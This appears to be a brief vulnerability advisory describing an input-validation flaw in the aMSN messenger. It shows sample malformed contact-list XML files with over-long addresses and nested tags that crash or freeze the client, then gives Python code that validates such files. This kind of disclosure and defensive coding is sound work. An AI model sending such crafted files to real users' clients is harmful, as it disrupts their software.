Risk: Low
Typology: Input Validation Error

All aMSN versions, on both Windows and Linux platforms.

Like Microsoft MSN, aMSN has a nice feature for exporting and importing your list of
contacts.

This list is dumped into an XML file (file extension .ctt) with this structure:

-----------------------
<?xml version="1.0"?>
<messenger>
<service name=".NET Messenger Service">
<contactlist>
<contact> your_contact@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
-----------------------


aMSN does not correctly validate the contacts you import; more precisely, it does not
parse the format of this file, and when you import a malformed contact list it suddenly
shuts down.

Here is an example of a malformed input list:

-----------------------
<?xml version="1.0"?>
<messenger>
<service name=".NET Messenger Service">
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
-----------------------


Or another possibility:

-----------------------
<?xml version="1.0"?>
<messenger>
<service name=".NET Messenger Service">
<contactlist>
<contact><contact><contact><contact>
<contact></contact></contact><contact>
</contact></contact></contact></contact>
</contact>
</contactlist>
</service>
</messenger>
-----------------------


This will cause aMSN to freeze.

If you use the same "trick" with MS Messenger, a MessageBox will advise you of the malformed
file.
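
The kind of check an importer needs before it trusts a .ctt file, as an added example (this is not aMSN's code, which the post does not show): parse strictly, accept only the structure shown above, and refuse over-long or malformed addresses with an error instead of crashing. The function names, the size limits and the address pattern are assumptions made for the illustration.

```python
import re
import xml.etree.ElementTree as ET

MAX_FILE_BYTES = 256 * 1024   # assumed cap for an exported contact list
MAX_ADDRESS_LEN = 129         # assumed cap on one address (not from the post)
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

class ContactListError(ValueError):
    """Raised for any .ctt file the importer should refuse."""

def parse_ctt(data: bytes) -> list[str]:
    """Return the addresses in a .ctt file, or raise ContactListError."""
    if len(data) > MAX_FILE_BYTES or b"<!DOCTYPE" in data:
        raise ContactListError("file too large or carries a DTD")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:   # unbalanced or otherwise broken markup
        raise ContactListError(f"not well-formed XML: {exc}") from exc
    if root.tag != "messenger":
        raise ContactListError("root element must be <messenger>")
    contacts = root.findall("./service/contactlist/contact")
    if len(contacts) != sum(1 for _ in root.iter("contact")):
        raise ContactListError("<contact> in an unexpected position")
    addresses = []
    for contact in contacts:
        if len(contact):           # any child element inside <contact>
            raise ContactListError("<contact> must contain only text")
        address = (contact.text or "").strip()
        if len(address) > MAX_ADDRESS_LEN or not ADDRESS_RE.fullmatch(address):
            raise ContactListError(f"invalid address: {address[:40]!r}")
        addresses.append(address)
    return addresses

def ctt(body: str) -> bytes:   # wraps <contact> markup in a constructed sample file
    return ('<?xml version="1.0"?><messenger><service name=".NET Messenger Service">'
            f"<contactlist>{body}</contactlist></service></messenger>").encode()

def is_accepted(data: bytes) -> bool:
    try:
        return parse_ctt(data) is not None
    except ContactListError:
        return False

if __name__ == "__main__":
    # Constructed samples modelled on the three files shown in the post.
    for body in ("<contact> your_contact@xxxx.yy</contact>",
                 "<contact>" + "A" * 46 + "\n\n" + "A" * 23 + "@xxxx.yy</contact>",
                 "<contact><contact></contact></contact></contact>"):
        print(is_accepted(ctt(body)))
```

The caller catches ContactListError and reports the bad file to the user, which is the behaviour the post describes for MS Messenger.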

See you in the next post.